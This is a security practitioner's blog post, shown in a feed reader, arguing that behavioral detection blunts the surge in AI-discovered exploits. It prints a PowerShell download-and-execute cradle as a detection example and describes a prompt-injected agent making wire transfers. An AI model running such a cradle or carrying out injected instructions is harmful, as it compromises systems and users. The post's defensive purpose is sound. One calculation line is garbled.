惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Apple Machine Learning Research
Apple Machine Learning Research
AWS News Blog
AWS News Blog
Google DeepMind News
Google DeepMind News
U
Unit 42
博客园 - 叶小钗
博客园 - 聂微东
GbyAI
GbyAI
Stack Overflow Blog
Stack Overflow Blog
有赞技术团队
有赞技术团队
aimingoo的专栏
aimingoo的专栏
D
DataBreaches.Net
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
Jina AI
Jina AI
美团技术团队
The Cloudflare Blog
M
MIT News - Artificial intelligence
Microsoft Azure Blog
Microsoft Azure Blog
I
InfoQ
S
Schneier on Security
C
Check Point Blog
Project Zero
Project Zero
The Hacker News
The Hacker News
Scott Helme
Scott Helme
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
Cisco Talos Blog
Cisco Talos Blog
P
Privacy International News Feed
SecWiki News
SecWiki News
Latest news
Latest news
MongoDB | Blog
MongoDB | Blog
S
Secure Thoughts
Google Online Security Blog
Google Online Security Blog
F
Fortinet All Blogs
博客园 - 三生石上(FineUI控件)
H
Help Net Security
TaoSecurity Blog
TaoSecurity Blog
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Last Week in AI
Last Week in AI
P
Privacy & Cybersecurity Law Blog
Forbes - Security
Forbes - Security
G
GRAHAM CLULEY
N
Netflix TechBlog - Medium
L
Lohrmann on Cybersecurity
A
About on SuperTechFans
T
The Exploit Database - CXSecurity.com
C
Cisco Blogs
PCI Perspectives
PCI Perspectives
大猫的无限游戏
大猫的无限游戏
T
Troy Hunt's Blog
H
Hacker News: Front Page
Vercel News
Vercel News

Hacker News - Newest: "LLM"

GitHub - lechmazur/position_bias: A benchmark for testing whether LLM judges keep the same preference when two lightly edited versions of the same story are shown in opposite orders. Flex routing (EU and EFTA) Dark Factories: Retooling for LLM Velocity Ask HN: What would be the impact of a LLM output injection attack? GitHub - AronDaron/dataset-generator: No-code desktop app for generating high-quality synthetic datasets to fine-tune LLMs — plan-then-execute pipeline, LLM-as-judge, HuggingFace upload. GitHub - Oaklight/llm-rosetta: Production-ready LLM API translation layer for Python — bidirectional conversion between OpenAI, Anthropic & Google formats via hub-and-spoke IR. Optional API gateway. Streaming & non-streaming. Zero core deps. Contributions welcome! GitHub - browser-use/browser-harness: Self-healing browser harness that enables LLMs to complete any task. GitHub - moeen-mahmud/remen: Remen turns thoughts into something you can return to Analyzing 156 LLM Launch Posts on Hacker News ChatGPT vs Gemini vs Claude: The Best LLM Subscription You Should Buy GitHub - salaamalykum/quran-semantic-search: High-density RAG Semantic Search Engine & Quran Corpus (GEO/SEO Architecture) GitHub - NVIDIA/TensorRT-LLM: TensorRT LLM provides users with an easy-to-use Python API to define Large Language Models (LLMs) and supports state-of-the-art optimizations to perform inference efficiently on NVIDIA GPUs. TensorRT LLM also contains components to create Python and C++ runtimes that orchestrate the inference execution in a performant way. The State of LLM Bug Bounties in 2026 Operational Readiness Criteria for Tool-Using LLM Agents Meshcore: Architecture for a Decentralized P2P LLM Inference Network How an LLM becomes more coherent as we train it GitHub - seetrex-ai/laimark GitHub - Jossifresben/BibCrit: AI-assited biblical textual criticism GitHub - wastedcode/memex: File system based wiki, maintained by Claude 99helpers.com GitHub - cliver-project/AITrigram GitHub - unbody-io/adapt: A self-evolving memory layer for AI agents. GitHub - hb20007/awesome-gen-ai-fails: A list of incidents where reliance on generative AI and LLMs resulted in harm to companies, individuals, or society GitHub - nevenkordic/localmind: Run any local LLM with persistent memory and context. CLI agent over Ollama with SQLite-backed hybrid recall. No cloud. Ask HN: What are the machine requirements for a LLM like Llama-3.1-8B? Faster LLM Inference via Sequential Monte Carlo grpo explained: group relative policy optimization for llm finetuning - cgft Stop comparing price per million tokens: the hidden LLM API costs · TensorZero Andrej Karpathy's LLM Wiki Is a Bad Idea GitHub - GG-QandV/mnemostroma: Offline RAM-first cognitive leer/coprocessor for AI agents and robotics. Solves "Context Abandonment" with 20-80ms latency using a dual-thread biomimetic memory architecture (ONNX + SQLite WAL). mempalace/agent at agent · skorotkiewicz/mempalace GitHub - Nyquest-ai/nyquest-rust-fullstack-pub: Nyquest — Semantic Compression Proxy for LLMs. 350+ rules, local LLM stage, 15-75% token savings. Full Rust stack. GitHub - TheoV823/mneme: Enforce architectural decisions in AI-assisted development. GitHub - klemenvod/TokenBrawl: A 1v1 Bomberman-style game where two LLM agents play autonomously against each other. No human plays — you watch the AIs fight. Each agent receives a text description of the board state, reasons about it, and outputs a move as JSON. The game engine executes it. Introducing the Common AI Provider: LLM and AI Agent Support for Apache Airflow Power Circuit AI: Designing Power Electronic Circuits for Motor Drives with Generative Artificial Intelligence Ask HN: How to program with IDE and LLM on CPU locally? Show HN: Agent-cache – Multi-tier LLM/tool/session caching for Valkey and Redis Bonsai 1-bit WebGPU - a Hugging Face Space by webml-community The LLM Fallacy: Misattribution in AI-Assisted Cognitive Workflows Ask HN: Simple tooling for local LLM code critique without IDE integration? Can a General LLM Diagnose a DICOM Slice? A 10-Case Public Benchmark Charts-of-Thought: Enhancing LLM Visualization Literacy (PDF, 2026) GitHub - Mesh-LLM/mesh-llm: Distributed AI/LLM for the people. Share compute privately or publicly to power your agents and chat. GitHub - seamus-brady/springdrift: A persistent runtime for long-lived LLM agents Writing an LLM from scratch, part 32k -- Interventions: training a better model locally with gradient accumulation Ask HN: Which LLM model and agentic CLI are you using for local development? GitHub - wayneColt/modelcascade: Route local. Escalate smart. Never overspend. Open-source multi-model cascade routing for autonomous agents. LLM pricing is 100x harder than you think GitHub - asakin/llm-primer: Pre-warmed Claude Code sessions in tmux. No startup wait. GitHub - EggerMarc/chat-rs: A multi-provider LLM framework for Rust. GitHub - SynapseKit/SynapseKit: Minimal, async-first Python framework for production LLM apps- 2 hard deps, no magic, no SaaS. A Claude Skill that Makes LLM Paragraphs More Bearable Does Gas Town 'steal' usage from users' LLM credits & paid services to improve itself? What's Claude Code Actually Doing? Open the Black Box with the Arthur Engine Milla Jovovich's New Open Source LLM Memory App and the Dark Code Problem Your intuition of LLM token usage might be wrong Show HN: Bloomberg Terminal for LLM ops – free and open source GitHub - 0xchamin/mcptube: Transform YouTube videos into a compounding knowledge base with transcripts, vision analysis, and agentic search. Works as an MCP server for Claude, Copilot & more. Show HN: Open KB: Open LLM Knowledge Base Your LLM is a compiler, not a runtime GitHub - sapountzis/Unslop: A Web Feed That Deserves You crates.io: Rust Package Registry Beyond Karpathy's LLM-Wiki: The Necessity of Cognitive Governance GitHub - amitshekhariitbhu/llm-internals: Learn LLM internals step by step - from tokenization to attention to inference optimization. GitHub - parallem-ai/parallem: An expressive library for running agents with the Batch API. GitHub - stfurkan/pi-llm LLM-Wiki Show HN: Formal – Formal verification for AI-generated code using Lean 4 LRTS – Regression testing for LLM prompts (open source, local-first) LLM Wiki Skill: Build a Second Brain with Claude Code and Obsidian I built an LLM Wiki and RAG solution: here's a demo for a security KB The biggest advance in AI since the LLM Predict-Rlm: The LLM Runtime That Lets Models Write Their Own Control Flow the-synthetic-library/the-synthetic-mind at main · joshferrer1/the-synthetic-library GitHub - yisding/reviewwiggum GitHub - Donnyb369/mcp-spine: Context Minifier & State Guard — Local-first MCP middleware proxy GitHub - Beledarian/wgpu-llm: A from-scratch LLM inference engine that uses wgpu (the cross-platform WebGPU implementation) to dispatch WGSL compute shaders for every math operation a Transformer needs. No CUDA. No Python. No massive framework dependencies. Just Rust, raw shaders, and your GPU. GitHub - anitiue/Hindsight: An experience-driven self-improvement framework for LLM agents — 基于经验的 LLM Agent 自我改进框架 GitHub - stef41/lmscan: 🔍 Detect AI-generated text and fingerprint which LLM wrote it. Open-source GPTZero alternative. Zero dependencies, works offline. GitHub - alainnothere/AmdPerformanceTesting: Amd Performance Testing Ask HN: Is a purely Markdown-based CRM a terrible idea? Optimized for LLM agents Context Engineering - LLM Memory and Retrieval for AI Agents | Weaviate little_helper_tui/letter.md at main · sleepyeldrazi/little_helper_tui GitHub - EvanZhouDev/umr: The Unified Model Registry for all your local AI apps. GitHub - JordanCT/VigIA-Orchestrator Your Agent Is Mine: Measuring Malicious Intermediary Attacks on the LLM Supply Chain A Taxonomy of RL Environments for LLM Agents Llama LLM Network Feture GitHub - genedeng-ca/ai-mac-migration: AI-powered Mac-to-Mac migration tool - replace Apple Migration Assistant with intelligent, selective transfer using local LLMs GitHub - lunargate-ai/gateway: High-performance self-hosted AI gateway (OpenAI-compatible) with routing, retries, and streaming GitHub - AuthBits/webmcp: A lightweight, prompt-driven MCP web research server for high-quality LLM powered information extraction. Externalization in LLM Agents: A Unified Review of Memory, Skills, Protocols and Harness Engineering Springdrift: An Auditable Persistent Runtime for LLM Agents with Case-Based Memory, Normative Safety, and Ambient Self-Perception High-Stakes Personalization: Rethinking LLM Customization for Individual Investor Decision-Making From Static Templates to Dynamic Runtime Graphs: A Survey of Workflow Optimization for LLM Agents HUOZIIME: An On-Device LLM-enhanced Input Method for Deep Personalization TIDE: Token-Informed Depth Execution for Per-Token Early Exit in LLM Inference Characterizing WebGPU Dispatch Overhead for LLM Inference Across Four GPU Vendors, Three Backends, and Three Browsers LLM Targeted Underperformance Disproportionately Impacts Vulnerable Users
Why a Decade of Writing Detection Logic Makes the Mythos Exploit Numbers Less Scary
badcryptobit · 2026-05-05 · via Hacker News - Newest: "LLM"

Anthropic’s marketing team has been pushing its new Mythos cybersecurity model and the volume of vulnerabilities it’s finding. According to Mozilla, those findings appear to be legitimate. If the pace holds up near term, a lot of people inside and outside the industry are worried, with good reason, and wondering if this is the new normal.

As someone who’s been writing detection logic for cybersecurity vendors for nearly a decade, these numbers are less scary and less world-ending than they appear. I’ve managed SOCs that regularly went up against state-sponsored actors, in the role where our organization won the Cogswell Award from the Defense Counterintelligence Agency. I’ve worked for a Fortune 100 doing detection at an enterprise scale most engineers never get to see, and put out the first public white paper on detection as code. All of that to say, I’ve been at it for quite some time now. While I think the short-term impact of models like Mythos is going to be rough, I also believe It’s also a lot less bad than people are making it out to be.

New Exploit Releases Have Always Far Exceeded Defenders’ Ability to Write Detection

Writing detection logic has always been whack-a-mole. David Bianco’s Pyramid of Pain, one of our industry’s foundational write-ups, argues exactly this. You lean on behavioral detection over individual IoCs and exploits because new exploit disclosures have always outrun defenders’ ability to write rules. One-off exploit coverage isn’t where detection engineers spend most of their time. People still do it. The ET Open ruleset is a decent look at how many individual rules exist for historical CVEs. Rules typically get written for the major vulnerabilities, anything actively used against your industry, and the handful of cases where automation makes the work cheap.

Adversaries Haven’t Needed Zero-Days

Threat actors haven’t needed zero-days to compromise their targets. Old exploits have worked just fine for decades. One of the most prevalent initial-access techniques today, ClickFix, doesn’t rely on zero-days at all, it tricks users into pasting malicious code into PowerShell or the Run dialog and executing it themselves.

Detection Logic Doesn’t Map 1-to-1 to Exploits

For anyone who hasn’t written detection logic before, my favorite example of why behavioral detection beats signature-based hunting on individual exploits and IOCs is Remote Code Execution (RCE) bugs in Microsoft Office. Office products like Word and Excel have produced some of the most impactful and most abused vulnerabilities in the industry for two decades, more than 1,000 distinct RCE CVEs and counting.

Microsoft Office RCE Vulnerabilities by Year All Office product CPEs in NVD — Word, Excel, Outlook, PowerPoint, Visio, Access, Publisher, Project, OneNote, 365 Apps, LTSC, Office Online Server 2002 – April 2026 · 1,072 total Office RCE CVEs 0 20 40 60 80 100 120 140 160 RCE CVEs published (NVD) 4 2002 4 2003 5 2004 7 2005 44 2006 34 2007 62 2008 39 2009 87 2010 41 2011 23 2012 44 2013 19 2014 56 2015 60 2016 50 2017 64 2018 39 2019 61 2020 57 2021 40 2022 33 2023 36 2024 144 2025 19* 2026 Record year (144)AI-assisted discovery Standard year Record year Partial year Source: NVD CPE-matched · magonia research * 2026 partial through April 27 (19 RCEs YTD)

Despite the prevalence of these vulnerabilities and their impact, detecting their abuse is a lot less difficult than one might think. For example, in 2022 Microsoft changed the default so that Office documents arriving from the internet, those tagged with Mark of the Web (MOTW), would no longer run macros, requiring the user to right-click the document and choose Unblock or run Unblock-File in PowerShell. While some may think of this as an exploit mitigation or hardening rather than detection, I disagree. From a detection engineer’s perspective, before Microsoft made this change I could have written a custom detector for that same behavior. After Microsoft implemented it, there was a major drop in macro-based malicious document delivery.

Microsoft Office Share of Malware Deliveries HP Wolf Sure Click Enterprise telemetry — share of isolated threats arriving as Office files (Word, Excel, PowerPoint, Outlook) Quarterly data, 2021 – 2025 0% 10% 20% 30% 40% 50% 60% Office share of isolated deliveries 40 Q3 2021 50 Q4 2021 44.5 Q1 2022 45 Q2 2022 32 Q3 2022 37 Q4 2022 32 Q1 2023 30.5 Q2 2023 31.5 Q3 2023 28.5 Q4 2023 18 Q1 2024 16 Q2 2024 15 Q3 2024 11 Q4 2024 14 Q1 2025 13 Q2 2025 12 Q3 2025 15 Q4 2025 All-time peakQ4 2021 = 50% Microsoft macro blockJul 2022 · −13pp Office share roughly halves2023 ~30% → 2024 ~15% AI-vuln-discovery erano spike (avg 13.5%) Standard quarter Inflection quarter All-time peak Source: HP Wolf Threat Insights · magonia research

This, combined with modern EDR tooling that makes profiling behaviors easy, lets you build baselines and detections for behaviors like an Office document spawning a child process, a hallmark behavior of an Office document executing code. Like the prior behavior, this dramatically reduces a threat actor’s ability to get successful code execution through an Office document regardless of the exploit used.

Overlapping Maldoc Behaviors Three overlapping behaviors — each low-fidelity alone, high-confidence in combination MOTW + Macro Internet-tagged Office doc runs VBA Office Parent → Child winword.exe / excel.exe spawns child process PowerShell IEX (Web) iex (New-Object Net.WebClient) .DownloadString('URL') MALDOC magonia research · detection-engineering perspective

Overlapping these two behaviors makes successful code execution exponentially harder. From there you can layer more, such as PowerShell executing a .ps1 file downloaded from the web. As a detection engineer, my job is to overlap enough behaviors that when one fires, the others raise the confidence it’s actually malicious, typically by tying them to scores in a Risk-Based Alerting model, where each new detection raises the cumulative likelihood of malicious activity.

Machine Learning and Anomaly Detection is Unlikely to be the Answer

Organizations are scrambling because of the headlines showing the sky is falling for blue teams, and mature detection teams aren’t an exception. Most are looking at ways to transition from individual behavioral detectors to machine learning based models. I think that’s a mistake, and there is research to back it up.

Two papers from the security research community laid out the case against ML-based intrusion detection long before the current AI wave (something anyone that’s worked a SOC doesn’t need a research paper to know):

Sommer and Paxson’s critique runs to five points, but only three really matter here.

The first is that ML is good at classification, deciding which of several known categories an input belongs to. Anomaly detection inverts the problem. You train on benign traffic and ask the system to flag everything that doesn’t fit. The textbook they cite calls this the closed-world assumption, and they note plainly that it isn’t of much use in real-life problems. Spam classification works because both spam and ham can be trained. Recommendation systems work because they’re surfacing similar items, not novel ones. Network intrusion detection is the opposite shape of problem.

The second is the diversity of network traffic. Real traffic is heavy-tailed, bursty, and variable on every time scale that matters operationally. There is no stable “normal” to learn against. A model that performed well in March will start drifting by June because the application mix shifted, the workforce moved, a new SaaS rolled out, or a major holiday changed user behavior. That drift inflates the false positive rate, which Axelsson tells us is the thing you cannot afford to inflate.

The third is what they call the semantic gap. Even when an anomaly detector flags something correctly, it tells the analyst that an event was unusual, not that it was malicious, not what it was trying to do, and not what to do about it. The analyst still has to do the work of figuring out whether the unusual event matters. In a real SOC, that work is the bottleneck.

If you’re going to use ML in this space, Sommer and Paxson have a few practical recommendations on how to do it well.

Their first recommendation, and the one I’d put above the others, is to understand what the system is actually doing. The PEAK Threat Hunting Framework walks through performing structured threat hunts that can help both document and achieve this understanding.

Their second is to keep the scope as narrow as possible. Don’t ask the model to detect “attacks” in general, ask it to detect a specific, well-defined activity.

Their third is the one that tends to get missed. They argue that machine learning is often most useful as a feature-discovery tool rather than the detector itself. Meaning you use ML to find which features of benign and malicious traffic carry the most signal, then build a non-ML detector on top of those features.

The other point that becomes relevant is the Base Rate Fallacy paper, which they reference:

“In intrusion detection, the relative cost of any misclassification is extremely high compared to many other machine learning applications. A false positive requires spending expensive analyst time examining the reported incident only to eventually determine that it reflects benign underlying activity. As argued by Axelsson, even a very small rate of false positives quickly renders an NIDS unusable.”

This paper, in my opinion, is required reading for detection engineers. To understand why it came to this conclusion, let’s break it down with an easy-to-understand example.

NOTE: For the purposes of this paper, a True Positive is considered any investigation that leads to a malicious outcome and a False Positive is any investigation that is benign activity. I recommend avoiding using a binary True/False positive when it comes to security monitoring however.

Take a small environment of a million events per day, with two actual intrusions per day. Assume each intrusion creates ten events, meaning twenty intrusive events out of a million total. The probability that any given event is intrusive works out to 20 / 1,000,000 = 0.00002. That tiny probability is what makes the false positive rate the most important measurement of the effectiveness of a piece of detection logic.

Detection rate and false positive rate are commonly confused and thought to be inverses, but they are not. Detection rate is true positives over actual intrusive events, whereas the false positive rate is false positives over actual benign events. The two numbers can move independently. The reason false positive rate ends up dominating isn’t that it matters more in some abstract sense, it’s that the benign population is roughly 50,000 times larger than the intrusive one. A perfect detection rate only buys you twenty hits because there are only twenty intrusive events to hit. A false positive rate of 0.001 generates a thousand false hits because there are nearly a million benign events to fire on. False positive rate gets multiplied by a much bigger number than detection rate does.

So to determine the true positive rate (TPR) it is: TPR = TP / actual intrusive events. Using our example, 20 / 20 = 1.0 (perfect detector catches all 20 intrusive events).

To determine the false positive rate (FPR) it is FPR = FP / actual benign events. Using our example, the FPR is 0.001: 1,000 / 999,9800.001.

With a detection rate of 1.0, a perfect detector, and a false positive rate of 0.00001, you catch all twenty intrusive events as true positives. You also throw roughly ten false positives on benign traffic, since 1,000,000 × 0.00001 = 10. Twenty real alerts out of thirty total. A Bayesian detection rate around 66%.

Raise the false positive rate to 0.001, which still sounds respectable on paper, and the alert queue explodes. The twenty true positives don’t move, but the false positive count jumps to 1,000,000 × 0.001 = 1,000. Twenty real alerts out of 1,020 total, or roughly 2%.

That 2% is more brutal than it looks. The 2% is the probability that any single alert sitting in the analyst’s queue is part of a real intrusion. Not “2% of intrusions get detected.” Both intrusions are technically in the alert queue, and at perfect detection rate you’d fire on at least one event from each.

The problem is the analyst can’t tell which twenty alerts out of 1,020 are the real ones without working through every alert. They drown in a thousand false positives to find the twenty real ones. Per-alert trust is too low to act on, even though the intrusions are detected.

The analyst learns to ignore the system within a week. This is why detection rate isn’t what kills you. False positive rate is.

Behavioral Detections Have Less Drift

A well-scoped behavioral rule keys on something with no legitimate business purpose, and “no legitimate business purpose” is a property that rarely drifts. winword.exe spawning powershell.exe is the example I keep coming back to. There’s almost no workflow that needs Word to launch a scripting interpreter. That’s true on a hospital network in 2014 and a law firm in 2026. Traffic volume can double, the workforce can go remote, a new SaaS can roll out, and the rule’s false positive rate rarely moves. None of those shifts generate winword.exe → powershell.exe pairs.

This is how a rule lands near the FPR Axelsson’s math actually requires and stays there. The detector isn’t learning what’s normal from current traffic, but it’s defining a structural fact about the system. ML anomaly detection doesn’t have that property. Its “normal” is a snapshot of the traffic it was trained on, and when the environment shifts the false positive rate spikes, not because anything malicious is happening, but because the baseline moved. Every drift is another retrain, and every retrain is another chance to raise your FPR.

Defenders Also Have AI/LLMs…

Defenders have access to the same models. Like exploit devs hunting zero-days, blue teams are using them to identify new behaviors and work through their behavioral backlogs much faster. And as covered above, detection isn’t 1:1 with exploits, even zero-days.

While I’ve been critical of anomaly detection and ML for detection engineering, it does have its place. As Sommer and Paxson’s paper points out, it can work when targeted at specific, well-scoped use cases. It’s not a binary “use either AI/ML or behaviors”, it’s both.

What Scares Me with LLMs Isn’t a Surge in Exploits

The biggest worry I have with LLMs isn’t the surge in new exploits, but the increase in attack surfaces that aren’t well understood, and the level of access these agents are being given. I also worry that AI agents will make anomaly detection systems even more prone to false positives, since they’re non-deterministic by nature.

For example, it’ll likely become the new normal for those in non-technical roles to start using these agents. If a member of accounting gets prompt injected and the agent is instructed to initiate a wire transfer using the user’s legitimate browser cookies, that gets difficult to detect. And because the user isn’t the one carrying out the task, they may not even know it’s being done, or be able to tell the security team whether or not it was intentional.

Closing / TL;DR

In the short term, I think the increase in exploit availability will negatively impact defenders while the industry and defensive tooling catch up. Most organizations are still figuring out how to use LLMs for detection, and that’s typically much less straightforward than exploit development, environments are dynamic and varied, and high-quality training data is hard to come by.

Long term, I think the gap between new exploits and new detections will start to even out, even though the relationship was never 1:1 to begin with. The thing I actually worry about isn’t the exploit count, it’s the level of access these agents are being given, and the fact that the attack surface they introduce still isn’t well understood.